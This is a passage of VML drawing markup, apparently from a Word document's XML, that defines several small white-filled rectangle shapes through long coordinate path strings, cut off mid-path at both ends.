,9650,2425,9654,2425,9658,2425,9662,2425,9666,2425,9671,2425,9675,2425,9680,2425,9684,2425,9689,2425,9694,2425,9699,2425,9704,2425,9709,2425,9715,2425,9720,2425,9725,2425,9731,2425,9737,2425,9742,2425,9748,2425,9754,2425,9760,2425,9766,2425,9773,2425,9779,2425,9779,2425,9779,2425,9779,2425,9779,2425,9779,2425,9779,2425,9779,2425,9779,2425,9779,2425,9779,2425,9779,2425,9779,2425,9779,2425,9779,2425,9779,2425,9779,2425,9779,2425,9779,2425,9779,2425,9779,2425,9779,2425,9779,2424,9779,2424,9779,2424,9779,2424,9779,2424,9779,2424,9779,2424,9779,2423,9779,2423,9779,2423,9779,2423,9779,2423,9779,2422,9779,2422,9779,2422,9779,2422,9779,2421,9779,2421,9779,2421,9779,2420,9779,2420,9779,2420,9779,2419,9779,2419,9779,2418,9779,2418,9779,2417,9779,2417,9779,2416,9779,2416,9779,2415,9779,2415,9779,2414,9779,2413,9779,2413,9779,2412,9779,2411,9779,2411,9779,2410,9779,2409,9779,2408,9779,2407,9779,2407,9779,2406,9779,2405,9779,2404,9779,2403,9779,2402,9779,2401,9779,2400,9779,2399,9779,2398,9779,2396,9779,2395,9779,2394,9779,2393,9779,2391,9779,2390,9779,2389,9779,2387,9779,2386,9779,2384,9779,2383,9779,2381,9779,2380,9779,2378,9779,2377,9779,2375,9779,2373,9779,2372,9779,2370,9779,2368,9779,2366,9779,2364,9779,2362,9779,2360,9779,2358,9779,2356,9779,2354,9779,2352,9779,2350,9779,2347,9779,2345,9779,2343,9779,2340,9779,2338,9779,2335,9779,2333,9779,2330,9779,2328,9779,2325,9779,2322,9779,2320,9779,2317,9779,2314,9779,2311,9779,2308,9779,2305,9779,2305,9779,2305,9779,2305,9779,2305,9779,2305,9779,2305,9779,2305,9779,2305,9779,2305,9779,2305,9779,2305,9779,2305,9779,2305,9779,2305,9779,2305,9779,2305,9778,2305,9778,2305,9778,2305,9778,2305,9778,2305,9778,2305,9778,2305,9777,2305,9777,2305,9777,2305,9777,2305,9776,2305,9776,2305,9776,2305,9775,2305,9775,2305,9774,2305,9774,2305,9773,2305,9773,2305,9772,2305,9772,2305,9771,2305,9771,2305,9770,2305,9769,2305,9768,2305,9768,2305,9767,2305,9766,2305,9765,2305,9764,2305,9763,2305,9762,2305,9761,2305,9760,2305,9759,2305,9758,2305,9756,2305,9755,2305,9754,2305,9752,2305,9751,2305,9749,2305,9748,2305,9746,2305,9745,2305,9743,2305,9741,2305,9739,2305,9737,2305,9735,2305,9733,2305,9731,2305,9729,2305,9727,2305,9725,2305,9722,2305,9720,2305,9718,2305,9715,2305,9712,2305,9710,2305,9707,2305,9704,2305,9701,2305,9698,2305,9695,2305,9692,2305,9689,2305,9686,2305,9683,2305,9679,2305,9676,2305,9672,2305,9669,2305,9665,2305,9661,2305,9657,2305,9653,2305,9649,2305,9645,2305,9641,2305,9636,2305,9632,2305,9628,2305,9623,2305,9618,2305,9613,2305,9609,2305,9604,2305,9599,2305,9593,2305,9588,2305,9583,2305,9577,2305,9572,2305,9566,2305,9560,2305,9555,2305,9549,2305,9543,2305,9536,2305,9530,2305,9524e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:138.500pt;margin-top:475.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2770,9510" coordsize="130,250">
        <v:shape style="position:absolute;left:2770;top:9510;width:130;height:250" coordorigin="2770,9510" coordsize="130,250" path="m2785,9524l2785,9524,2785,9524,2785,9524,2785,9524,2785,9524,2785,9524,2785,9524,2785,9524,2785,9524,2785,9524,2785,9524,2785,9524,2786,9524,2786,9524,2786,9524,2786,9524,2786,9524,2786,9524,2786,9524,2786,9524,2786,9524,2786,9524,2786,9524,2786,9524,2786,9524,2787,9524,2787,9524,2787,9524,2787,9524,2787,9524,2787,9524,2788,9524,2788,9524,2788,9524,2788,9524,2788,9524,2789,9524,2789,9524,2789,9524,2790,9524,2790,9524,2790,9524,2791,9524,2791,9524,2791,9524,2792,9524,2792,9524,2793,9524,2793,9524,2794,9524,2794,9524,2795,9524,2795,9524,2796,9524,2797,9524,2797,9524,2798,9524,2799,9524,2799,9524,2800,9524,2801,9524,2802,9524,2802,9524,2803,9524,2804,9524,2805,9524,2806,9524,2807,9524,2808,9524,2809,9524,2810,9524,2811,9524,2812,9524,2813,9524,2814,9524,2815,9524,2817,9524,2818,9524,2819,9524,2821,9524,2822,9524,2823,9524,2825,9524,2826,9524,2828,9524,2829,9524,2831,9524,2832,9524,2834,9524,2836,9524,2837,9524,2839,9524,2841,9524,2843,9524,2845,9524,2846,9524,2848,9524,2850,9524,2852,9524,2855,9524,2857,9524,2859,9524,2861,9524,2863,9524,2866,9524,2868,9524,2870,9524,2873,9524,2875,9524,2878,9524,2880,9524,2883,9524,2885,9524,2888,9524,2891,9524,2894,9524,2897,9524,2900,9524,2902,9524,2905,9524,2905,9524,2905,9524,2905,9524,2905,9524,2905,9524,2905,9524,2905,9524,2905,9524,2905,9524,2905,9524,2905,9524,2905,9524,2905,9524,2905,9524,2905,9524,2905,9524,2905,9524,2905,9525,2905,9525,2905,9525,2905,9525,2905,9525,2905,9525,2905,9526,2905,9526,2905,9526,2905,9526,2905,9527,2905,9527,2905,9527,2905,9528,2905,9528,2905,9529,2905,9529,2905,9530,2905,9530,2905,9531,2905,9531,2905,9532,2905,9533,2905,9533,2905,9534,2905,9535,2905,9536,2905,9537,2905,9538,2905,9539,2905,9540,2905,9541,2905,9542,2905,9543,2905,9544,2905,9545,2905,9546,2905,9548,2905,9549,2905,9550,2905,9552,2905,9553,2905,9555,2905,9557,2905,9558,2905,9560,2905,9562,2905,9563,2905,9565,2905,9567,2905,9569,2905,9571,2905,9574,2905,9576,2905,9578,2905,9580,2905,9583,2905,9585,2905,9588,2905,9590,2905,9593,2905,9596,2905,9598,2905,9601,2905,9604,2905,9607,2905,9610,2905,9614,2905,9617,2905,9620,2905,9623,2905,9627,2905,9631,2905,9634,2905,9638,2905,9642,2905,9646,2905,9650,2905,9654,2905,9658,2905,9662,2905,9666,2905,9671,2905,9675,2905,9680,2905,9684,2905,9689,2905,9694,2905,9699,2905,9704,2905,9709,2905,9715,2905,9720,2905,9725,2905,9731,2905,9737,2905,9742,2905,9748,2905,9754,2905,9760,2905,9766,2905,9773,2905,9779,2905,9779,2905,9779,2905,9779,2905,9779,2905,9779,2905,9779,2905,9779,2905,9779,2905,9779,2905,9779,2905,9779,2905,9779,2905,9779,2905,9779,2905,9779,2905,9779,2905,9779,2905,9779,2905,9779,2905,9779,2905,9779,2905,9779,2905,9779,2905,9779,2904,9779,2904,9779,2904,9779,2904,9779,2904,9779,2904,9779,2904,9779,2903,9779,2903,9779,2903,9779,2903,9779,2902,9779,2902,9779,2902,9779,2902,9779,2901,9779,2901,9779,2901,9779,2900,9779,2900,9779,2899,9779,2899,9779,2899,9779,2898,9779,2898,9779,2897,9779,2897,9779,2896,9779,2895,9779,2895,9779,2894,9779,2894,9779,2893,9779,2892,9779,2892,9779,2891,9779,2890,9779,2889,9779,2888,9779,2888,9779,2887,9779,2886,9779,2885,9779,2884,9779,2883,9779,2882,9779,2881,9779,2880,9779,2879,9779,2878,9779,2877,9779,2875,9779,2874,9779,2873,9779,2872,9779,2870,9779,2869,9779,2868,9779,2866,9779,2865,9779,2863,9779,2862,9779,2860,9779,2859,9779,2857,9779,2855,9779,2854,9779,2852,9779,2850,9779,2848,9779,2846,9779,2844,9779,2842,9779,2840,9779,2838,9779,2836,9779,2834,9779,2832,9779,2830,9779,2828,9779,2825,9779,2823,9779,2821,9779,2818,9779,2816,9779,2813,9779,2811,9779,2808,9779,2805,9779,2803,9779,2800,9779,2797,9779,2794,9779,2791,9779,2788,9779,2785,9779,2785,9779,2785,9779,2785,9779,2785,9779,2785,9779,2785,9779,2785,9779,2785,9779,2785,9779,2785,9779,2785,9779,2785,9779,2785,9779,2785,9779,2785,9779,2785,9778,2785,9778,2785,9778,2785,9778,2785,9778,2785,9778,2785,9778,2785,9777,2785,9777,2785,9777,2785,9777,2785,9776,2785,9776,2785,9776,2785,9775,2785,9775,2785,9774,2785,9774,2785,9773,2785,9773,2785,9772,2785,9772,2785,9771,2785,9771,2785,9770,2785,9769,2785,9768,2785,9768,2785,9767,2785,9766,2785,9765,2785,9764,2785,9763,2785,9762,2785,9761,2785,9760,2785,9759,2785,9758,2785,9756,2785,9755,2785,9754,2785,9752,2785,9751,2785,9749,2785,9748,2785,9746,2785,9745,2785,9743,2785,9741,2785,9739,2785,9737,2785,9735,2785,9733,2785,9731,2785,9729,2785,9727,2785,9725,2785,9722,2785,9720,2785,9718,2785,9715,2785,9712,2785,9710,2785,9707,2785,9704,2785,9701,2785,9698,2785,9695,2785,9692,2785,9689,2785,9686,2785,9683,2785,9679,2785,9676,2785,9672,2785,9669,2785,9665,2785,9661,2785,9657,2785,9653,2785,9649,2785,9645,2785,9641,2785,9636,2785,9632,2785,9628,2785,9623,2785,9618,2785,9613,2785,9609,2785,9604,2785,9599,2785,9593,2785,9588,2785,9583,2785,9577,2785,9572,2785,9566,2785,9560,2785,9555,2785,9549,2785,9543,2785,9536,2785,9530,2785,9524e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:114.500pt;margin-top:507.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2290,10150" coordsize="130,270">
        <v:shape style="position:absolute;left:2290;top:10150;width:130;height:270" coordorigin="2290,10150" coordsize="130,270" path="m2305,10169l2305,10169,2305,10169,2305,10169,2305,10169,2305,10169,2305,10169,2305,10169,2305,10169,2305,10169,2305,10169,2305,10169,2305,10169,2305,10169,2305,10169,2305,10169,2305,10169,2305,10169,2306,10169,2306,10169,2306,10169,2306,10169,2306,10169,2306,10169,2306,10169,2306,10169,2306,10169,2306,10169,2307,10169,2307,10169,2307,10169,2307,10169,2307,10169,2307,10169,2308,10169,2308,10169,2308,10169,2308,10169,2309,10169,2309,10169,2309,10169,2310,10169,2310,10169,2310,10169,2311,10169,2311,10169,2312,10169,2312,10169,2313,10169,2313,10169,2314,10169,2314,10169,2315,10169,2315,10169,2316,10169,2316,10169,2317,10169,2318,10169,2318,10169,2319,10169,2320,10169,2321,10169,2321,10169,2322,10169,2323,10169,2324,10169,2325,10169,2326,10169,2327,10169,2328,10169,2329,10169,2330,10169,2331,10169,2332,10169,2333,10169,2334,10169,2335,10169,2336,10169,2338,10169,2339,10169,2340,10169,2342,10169,2343,10169,2344,10169,2346,10169,2347,10169,2349,10169,2350,10169,2352,10169,2354,10169,2355,10169,2357,10169,2359,10169,2361,10169,2362,10169,2364,10169,2366,10169,2368,10169,2370,10169,2372,10169,2374,10169,2376,10169,2379,10169,2381,10169,2383,10169,2385,10169,2388,10169,2390,10169,2392,10169,2395,10169,2397,10169,2400,10169,2403,10169,2405,10169,2408,10169,2411,10169,2414,10169,2416,10169,2419,10169,2422,10169,2425,10169,2425,10169,2425,10169,2425,10169,2425,10169,2425,10169,2425,10169,2425,10169,2425,10169,2425,10169,2425,10169,2425,10169,2425,10169,2425,10169,2425,10169,2425,10170,2425,10170,2425,10170,2425,10170,2425,10170,2425,10170,2425,10170,2425,10171,2425,10171,2425,10171,2425,10171,2425,10171,2425,10172,2425,10172,2425,10172,2425,10173,2425,10173,2425,10174,2425,10174,2425,10175,2425,10175,2425,10176,2425,10176,2425,10177,2425,10177,2425,10178,2425,10179,2425,10180,2425,10180,2425,10181,2425,10182,2425,10183,2425,10184,2425,10185,2425,10186,2425,10187,2425,10188,2425,10189,2425,10190,2425,10192,2425,10193,2425,10194,2425,10196,2425,10197,2425,10199,2425,10200,2425,10202,2425,10203,2425,10205,2425,10207,2425,10209,2425,10211,2425,10213,2425,10215,2425,10217,2425,10219,2425,10221,2425,10223,2425,10226,2425,10228,2425,10230,2425,10233,2425,10236,2425,10238,2425,10241,2425,10244,2425,10247,2425,10250,2425,10253,2425,10256,2425,10259,2425,10262,2425,10265,2425,10269,2425,10272,2425,10276,2425,10279,2425,10283,2425,10287,2425,10291,2425,10295,2425,10299,2425,10303,2425,10307,2425,10312,2425,10316,2425,10321,2425,10325,2425,10330,2425,10335,2425,10339,2425,10344,2425,10349,2425,10355,2425,10360,2425,10365,2425,10371,2425,10376,2425,10382,2425,10388,2425,10393,2425,10399,2425,10405,2425,10412,2425,10418,2425,10424,2425,10424,2425,10424,2425,10424,2425,10424,2425,10424,2425,10424,2425,10424,2425,10424,2425,10424,2425,10424,2425,10424,2425,10424,2425,10424,2425,10424,2425,10424,2425,10424,2425,10424,2425,10424,2425,10424,2425,10424,2425,10424,2425,10424,2424,10424,2424,10424,2424,10424,2424,10424,2424,10424,2424,10424,2424,10424,2423,10424,2423,10424,2423,10424,2423,10424,2423,10424,2422,10424,2422,10424,2422,10424,2422,10424,2421,10424,2421,10424,2421,10424,2420,10424,2420,10424,2420,10424,2419,10424,2419,10424,2418,10424,2418,10424,2417,10424,2417,10424,2416,10424,2416,10424,2415,10424,2415,10424,2414,10424,2413,10424,2413,10424,2412,10424,2411,10424,2411,10424,2410,10424,2409,10424,2408,10424,2407,10424,2407,10424,2406,10424,2405,10424,2404,10424,2403,10424,2402,10424,2401,10424,2400,10424,2399,10424,2398,10424,2396,10424,2395,10424,2394,10424,2393,10424,2391,10424,2390,10424,2389,10424,2387,10424,2386,10424,2384,10424,2383,10424,2381,10424,2380,10424,2378,10424,2377,10424,2375,10424,2373,10424,2372,10424,2370,10424,2368,10424,2366,10424,2364,10424,2362,10424,2360,10424,2358,10424,2356,10424,2354,10424,2352,10424,2350,10424,2347,10424,2345,10424,2343,10424,2340,10424,2338,10424,2335,10424,2333,10424,2330,10424,2328,10424,2325,10424,2322,10424,2320,10424,2317,10424,2314,10424,2311,10424,2308,10424,2305,10424,2305,10424,2305,10424,2305,10424,2305,10424,2305,10424,2305,10424,2305,10424,2305,10424,2305,10424,2305,10424,2305,10424,2305,10424,2305,10424,2305,10424,2305,10424,2305,10424,2305,10424,2305,10424,2305,10423,2305,10423,2305,10423,2305,10423,2305,10423,2305,10422,2305,10422,2305,10422,2305,10422,2305,10421,2305,10421,2305,10421,2305,10420,2305,10420,2305,10419,2305,10419,2305,10418,2305,10418,2305,10417,2305,10417,2305,10416,2305,10415,2305,10415,2305,10414,2305,10413,2305,10412,2305,10411,2305,10410,2305,10410,2305,10409,2305,10408,2305,10406,2305,10405,2305,10404,2305,10403,2305,10402,2305,10400,2305,10399,2305,10398,2305,10396,2305,10395,2305,10393,2305,10392,2305,10390,2305,10388,2305,10386,2305,10385,2305,10383,2305,10381,2305,10379,2305,10377,2305,10375,2305,10372,2305,10370,2305,10368,2305,10365,2305,10363,2305,10360,2305,10358,2305,10355,2305,10352,2305,10350,2305,10347,2305,10344,2305,10341,2305,10338,2305,10335,2305,10331,2305,10328,2305,10325,2305,10321,2305,10318,2305,10314,2305,10310,2305,10306,2305,10302,2305,10299,2305,10294,2305,10290,2305,10286,2305,10282,2305,10277,2305,10273,2305,10268,2305,10264,2305,10259,2305,10254,2305,10249,2305,10244,2305,10239,2305,10234,2305,10228,2305,10223,2305,10217,2305,10212,2305,10206,2305,10200,2305,10194,2305,10188,2305,10182,2305,10176,2305,10169e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:138.500pt;margin-top:507.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2770,10150" coordsize="130,270">
        <v:shape style="position:absolute;left:2770;top:10150;width:130;height:270" coordorigin="2770,10150" coordsize="130,270" path="m2785,10169l2785,10169,2785,10169,2785,10169,2785,10169,2785,10169,2785,10169,2785,10169,2785,10169,2785,10169,2785,10169,2785,10169,2785,10169,2786,10169,2786,10169,2786,10169,2786,10169,2786,10169,2786,10169,2786,10169,2786,10169,2786,10169,2786,10169,2786,10169,2786,10169,2786,10169,2787,10169,2787,10169,2787,10169,2787,10169,2787,10169,2787,10169,2788,10169,2788,10169,2788,10169,2788,10169,2788,10169,2789,10169,2789,10169,2789,10169,2790,10169,2790,10169,2790,10169,2791,10169,2791,10169,2791,10169,2792,10169,2792,10169,2793,10169,2793,10169,2794,10169,2794,10169,2795,10169,2795,10169,2796,10169,2797,10169,2797,10169,2798,10169,2799,10169,2799,10169,2800,10169,2801,10169,2802,10169,2802,10169,2803,10169,2804,10169,2805,10169,2806,10169,2807,10169,2808,10169,2809,10169,2810,10169,2811,10169,2812,10169,2813,10169,2814,10169,2815,10169,2817,10169,2818,10169,2819,10169,2821,10169,2822,10169,2823,10169,2825,10169,2826,10169,2828,10169,2829,10169,2831,10169,2832,10169,2834,10169,2836,10169,2837,10169,2839,10169,2841,10169,2843,10169,2845,10169,2846,10169,2848,10169,2850,10169,2852,10169,2855,10169,2857,10169,2859,10169,2861,10169,2863,10169,2866,10169,2868,10169,2870,10169,2873,10169,2875,10169,2878,10169,2880,10169,2883,10169,2885,10169,2888,10169,2891,10169,2894,10169,2897,10169,2900,10169,2902,10169,2905,10169,2905,10169,2905,10169,2905,10169,2905,10169,2905,10169,2905,10169,2905,10169,2905,10169,2905,10169,2905,10169,2905,10169,2905,10169,2905,10169,2905,10169,2905,10170,2905,10170,2905,10170,2905,10170,2905,10170,2905,10170,2905,10170,2905,10171,2905,10171,2905,10171,2905,10171,2905,10171,2905,10172,2905,10172,2905,10172,2905,10173,2905,10173,2905,10174,2905,10174,2905,10175,2905,10175,2905,10176,2905,10176,2905,10177,2905,10177,2905,10178,2905,10179,2905,10180,2905,10180,2905,10181,2905,10182,2905,10183,2905,10184,2905,10185,2905,10186,2905,10187,2905,10188,2905,10189,2905,10190,2905,10192,2905,10193,2905,10194,2905,10196,2905,10197,2905,10199,2905,10200,2905,10202,2905,10203,2905,10205,2905,10207,2905,10209,2905,10211,2905,10213,2905,10215,2905,10217,2905,10219,2905,10221,2905,10223,2905,10226,2905,10228,2905,10230,2905,10233,2905,10236,2905,10238,2905,10241,2905,10244,2905,10247,2905,10250,2905,10253,2905,10256,2905,10259,2905,10262,2905,10265,2905,10269,2905,10272,2905,10276,2905,10279,2905,10283,2905,10287,2905,10291,2905,10295,2905,10299,2905,10303,2905,10307,2905,10312,2905,10316,2905,10321,2905,10325,2905,10330,2905,10335,2905,10339,2905,10344,2905,10349,2905,10355,2905,10360,2905,10365,2905,10371,2905,10376,2905,10382,2905,10388,2905,10393,2905,10399,2905,10405,2905,10412,2905,10418,2905,10424,2905,10424,2905,10424,2905,10424,2905,10424,2905,10424,2905,10424,2905,10424,2905,10424,2905,10424,2905,10424,2905,10424,2905,10424,2905,10424,2905,10424,2905,10424,2905,10424,2905,10424,2905,10424,2905,10424,2905,10424,2905,10424,2905,10424,2905,10424,2905,10424,2904,10424,2904,10424,2904,10424,2904,10424,2904,10424,2904,10424,2904,10424,2903,10424,2903,10424,2903,10424,2903,10424,2902,10424,2902,10424,2902,10424,2902,10424,2901,10424,2901,10424,2901,10424,2900,10424,2900,10424,2899,10424,2899,10424,2899,10424,2898,10424,2898,10424,2897,10424,2897,10424,2896,10424,2895,10424,2895,10424,2894,10424,2894,10424,2893,10424,2892,10424,2892,10424,2891,10424,2890,10424,2889,10424,2888,10424,2888,10424,2887,10424,2886,10424,2885,10424,2884,10424,2883,10424,2882,10424,2881,10424,2880,10424,2879,10424,2878,10424,2877,10424,2875,10424,2874,10424,2873,10424,2872,10424,2870,10424,2869,10424,2868,10424,2866,10424,2865,10424,2863,10424,2862,10424,2860,10424,2859,10424,2857,10424,2855,10424,2854,10424,2852,10424,2850,10424,2848,10424,2846,10424,2844,10424,2842,10424,2840,10424,2838,10424,2836,10424,2834,10424,2832,10424,2830,10424,2828,10424,2825,10424,2823,10424,2821,10424,2818,10424,2816,10424,2813,10424,2811,10424,2808,10424,2805,10424,2803,10424,2800,10424,2797,10424,2794,10424,2791,10424,2788,10424,2785,10424,2785,10424,2785,10424,2785,10424,2785,10424,2785,10424,2785,10424,2785,10424,2785,10424,2785,10424,2785,10424,2785,10424,2785,10424,2785,10424,2785,10424,2785,10424,2785,10424,2785,10424,2785,10424,2785,10423,2785,10423,2785,10423,2785,10423,2785,10423,2785,10422,2785,10422,2785,10422,2785,10422,2785,10421,2785,10421,2785,10421,2785,10420,2785,10420,2785,10419,2785,10419,2785,10418,2785,10418,2785,10417,2785,10417,2785,10416,2785,10415,2785,10415,2785,10414,2785,10413,2785,10412,2785,10411,2785,10410,2785,10410,2785,10409,2785,10408,2785,10406,2785,10405,2785,10404,2785,10403,2785,10402,2785,10400,2785,10399,2785,10398,2785,10396,2785,10395,2785,10393,2785,10392,2785,10390,2785,10388,2785,10386,2785,10385,2785,10383,2785,10381,2785,10379,2785,10377,2785,10375,2785,10372,2785,10370,2785,10368,2785,10365,2785,10363,2785,10360,2785,10358,2785,10355,2785,10352,2785,10350,2785,10347,2785,10344,2785,10341,2785,10338,2785,10335,2785,10331,2785,10328,2785,10325,2785,10321,2785,10318,2785,10314,2785,10310,2785,10306,2785,10302,2785,10299,2785,10294,2785,10290,2785,10286,2785,10282,2785,10277,2785,10273,2785,10268,2785,10264,2785,10259,2785,10254,2785,10249,2785,10244,2785,10239,2785,10234,2785,10228,2785,10223,2785,10217,2785,10212,2785,10206,2785,10200,2785,10194,2785,10188,2785,10182,2785,10176,2785,10169e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:114.500pt;margin-top:538.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2290,10770" coordsize="130,270">
        <v:shape style="position:absolute;left:2290;top:10770;width:130;height:270" coordorigin="2290,10770" coordsize="130,270" path="m2305,10799l2305,10799,2305,10799,2305,10799,2305,10799,2305,10799,2305,10799,2305,10799,2305,10799,2305,10799,2305,10799,2305,10799,2305,10799,2305,10799,2305,10799,2305,10799,2305,10799,2305,10799,2306,10799,2306,10799,2306,10799,2306,10799,2306,10799,2306,10799,2306,10799,2306,10799,2306,10799,2306,10799,2307,10799,2307,10799,2307,10799,2307,10799,2307,10799,2307,10799,2308,10799,2308,10799,2308,10799,2308,10799,2309,10799,2309,10799,2309,10799,2310,10799,2310,10799,2310,10799,2311,10799,2311,10799,2312,10799,2312,10799,2313,10799,2313,10799,2314,10799,2314,10799,2315,10799,2315,10799,2316,10799,2316,10799,2317,10799,2318,10799,2318,10799,2319,10799,2320,10799,2321,10799,2321,10799,2322,10799,2323,10799,2324,10799,2325,10799,2326,10799,2327,10799,2328,10799,2329,10799,2330,10799,2331,10799,2332,10799,2333,10799,2334,10799,2335,10799,2336,10799,2338,10799,2339,10799,2340,10799,2342,10799,2343,10799,2344,10799,2346,10799,2347,10799,2349,10799,2350,10799,2352,10799,2354,10799,2355,10799,2357,10799,2359,10799,2361,10799,2362,10799,2364,10799,2366,10799,2368,10799,2370,10799,2372,10799,2374,10799,2376,10799,2379,10799,2381,10799,2383,10799,2385,10799,2388,10799,2390,10799,2392,10799,2395,10799,2397,10799,2400,10799,2403,10799,2405,10799,2408,10799,2411,10799,2414,10799,2416,10799,2419,10799,2422,10799,2425,10799,2425,10799,2425,10799,2425,10799,2425,10799,2425,10799,2425,10799,2425,10799,2425,10799,2425,10800,2425,10800,2425,10800,2425,10800,2425,10800,2425,10800,2425,10800,2425,10800,2425,10800,2425,10800,2425,10800,2425,10800,2425,10801,2425,10801,2425,10801,2425,10801,2425,10802,2425,10802,2425,10802,2425,10802,2425,10803,2425,10803,2425,10804,2425,10804,2425,10804,2425,10805,2425,10805,2425,10806,2425,10807,2425,10807,2425,10808,2425,10808,2425,10809,2425,10810,2425,10811,2425,10811,2425,10812,2425,10813,2425,10814,2425,10815,2425,10816,2425,10817,2425,10818,2425,10820,2425,10821,2425,10822,2425,10823,2425,10825,2425,10826,2425,10827,2425,10829,2425,10831,2425,10832,2425,10834,2425,10836,2425,10837,2425,10839,2425,10841,2425,10843,2425,10845,2425,10847,2425,10849,2425,10851,2425,10854,2425,10856,2425,10858,2425,10861,2425,10863,2425,10866,2425,10869,2425,10871,2425,10874,2425,10877,2425,10880,2425,10883,2425,10886,2425,10889,2425,10892,2425,10896,2425,10899,2425,10903,2425,10906,2425,10910,2425,10914,2425,10917,2425,10921,2425,10925,2425,10929,2425,10933,2425,10938,2425,10942,2425,10946,2425,10951,2425,10955,2425,10960,2425,10965,2425,10970,2425,10975,2425,10980,2425,10985,2425,10990,2425,10996,2425,11001,2425,11006,2425,11012,2425,11018,2425,11024,2425,11030,2425,11036,2425,11042,2425,11048,2425,11055,2425,11055,2425,11055,2425,11055,2425,11055,2425,11055,2425,11055,2425,11055,2425,11055,2425,11055,2425,11055,2425,11055,2425,11055,2425,11055,2425,11055,2425,11055,2425,11055,2425,11055,2425,11055,2425,11055,2425,11055,2425,11055,2425,11055,2424,11055,2424,11055,2424,11055,2424,11055,2424,11055,2424,11055,2424,11055,2423,11055,2423,11055,2423,11055,2423,11055,2423,11055,2422,11055,2422,11055,2422,11055,2422,11055,2421,11055,2421,11055,2421,11055,2420,11055,2420,11055,2420,11055,2419,11055,2419,11055,2418,11055,2418,11055,2417,11055,2417,11055,2416,11055,2416,11055,2415,11055,2415,11055,2414,11055,2413,11055,2413,11055,2412,11055,2411,11055,2411,11055,2410,11055,2409,11055,2408,11055,2407,11055,2407,11055,2406,11055,2405,11055,2404,11055,2403,11055,2402,11055,2401,11055,2400,11055,2399,11055,2398,11055,2396,11055,2395,11055,2394,11055,2393,11055,2391,11055,2390,11055,2389,11055,2387,11055,2386,11055,2384,11055,2383,11055,2381,11055,2380,11055,2378,11055,2377,11055,2375,11055,2373,11055,2372,11055,2370,11055,2368,11055,2366,11055,2364,11055,2362,11055,2360,11055,2358,11055,2356,11055,2354,11055,2352,11055,2350,11055,2347,11055,2345,11055,2343,11055,2340,11055,2338,11055,2335,11055,2333,11055,2330,11055,2328,11055,2325,11055,2322,11055,2320,11055,2317,11055,2314,11055,2311,11055,2308,11055,2305,11055,2305,11055,2305,11055,2305,11055,2305,11055,2305,11055,2305,11055,2305,11055,2305,11055,2305,11054,2305,11054,2305,11054,2305,11054,2305,11054,2305,11054,2305,11054,2305,11054,2305,11054,2305,11054,2305,11054,2305,11054,2305,11053,2305,11053,2305,11053,2305,11053,2305,11052,2305,11052,2305,11052,2305,11052,2305,11051,2305,11051,2305,11050,2305,11050,2305,11050,2305,11049,2305,11049,2305,11048,2305,11048,2305,11047,2305,11046,2305,11046,2305,11045,2305,11044,2305,11043,2305,11043,2305,11042,2305,11041,2305,11040,2305,11039,2305,11038,2305,11037,2305,11036,2305,11034,2305,11033,2305,11032,2305,11031,2305,11029,2305,11028,2305,11027,2305,11025,2305,11023,2305,11022,2305,11020,2305,11018,2305,11017,2305,11015,2305,11013,2305,11011,2305,11009,2305,11007,2305,11005,2305,11003,2305,11000,2305,10998,2305,10996,2305,10993,2305,10991,2305,10988,2305,10985,2305,10983,2305,10980,2305,10977,2305,10974,2305,10971,2305,10968,2305,10965,2305,10962,2305,10958,2305,10955,2305,10951,2305,10948,2305,10944,2305,10940,2305,10937,2305,10933,2305,10929,2305,10925,2305,10921,2305,10916,2305,10912,2305,10908,2305,10903,2305,10899,2305,10894,2305,10889,2305,10884,2305,10879,2305,10874,2305,10869,2305,10864,2305,10859,2305,10853,2305,10848,2305,10842,2305,10836,2305,10830,2305,10824,2305,10818,2305,10812,2305,10806,2305,10799e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:138.500pt;margin-top:538.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2770,10770" coordsize="130,270">
        <v:shape style="position:absolute;left:2770;top:10770;width:130;height:270" coordorigin="2770,10770" coordsize="130,270" path="m2785,10799l2785,10799,2785,10799,2785,10799,2785,10799,2785,10799,2785,10799,2785,10799,2785,10799,2785,10799,2785,10799,2785,10799,2785,10799,2786,10799,2786,10799,2786,10799,2786,10799,2786,10799,2786,10799,2786,10799,2786,10799,2786,10799,2786,10799,2786,10799,2786,10799,2786,10799,2787,10799,2787,10799,2787,10799,2787,10799,2787,10799,2787,10799,2788,10799,2788,10799,2788,10799,2788,10799,2788,10799,2789,10799,2789,10799,2789,10799,2790,10799,2790,10799,2790,10799,2791,10799,2791,10799,2791,10799,2792,10799,2792,10799,2793,10799,2793,10799,2794,10799,2794,10799,2795,10799,2795,10799,2796,10799,2797,10799,2797,10799,2798,10799,2799,10799,2799,10799,2800,10799,2801,10799,2802,10799,2802,10799,2803,10799,2804,10799,2805,10799,2806,10799,2807,10799,2808,10799,2809,10799,2810,10799,2811,10799,2812,10799,2813,10799,2814,10799,2815,10799,2817,10799,2818,10799,2819,10799,2821,10799,2822,10799,2823,10799,2825,10799,2826,10799,2828,10799,2829,10799,2831,10799,2832,10799,2834,10799,2836,10799,2837,10799,2839,10799,2841,10799,2843,10799,2845,10799,2846,10799,2848,10799,2850,10799,2852,10799,2855,10799,2857,10799,2859,10799,2861,10799,2863,10799,2866,10799,2868,10799,2870,10799,2873,10799,2875,10799,2878,10799,2880,10799,2883,10799,2885,10799,2888,10799,2891,10799,2894,10799,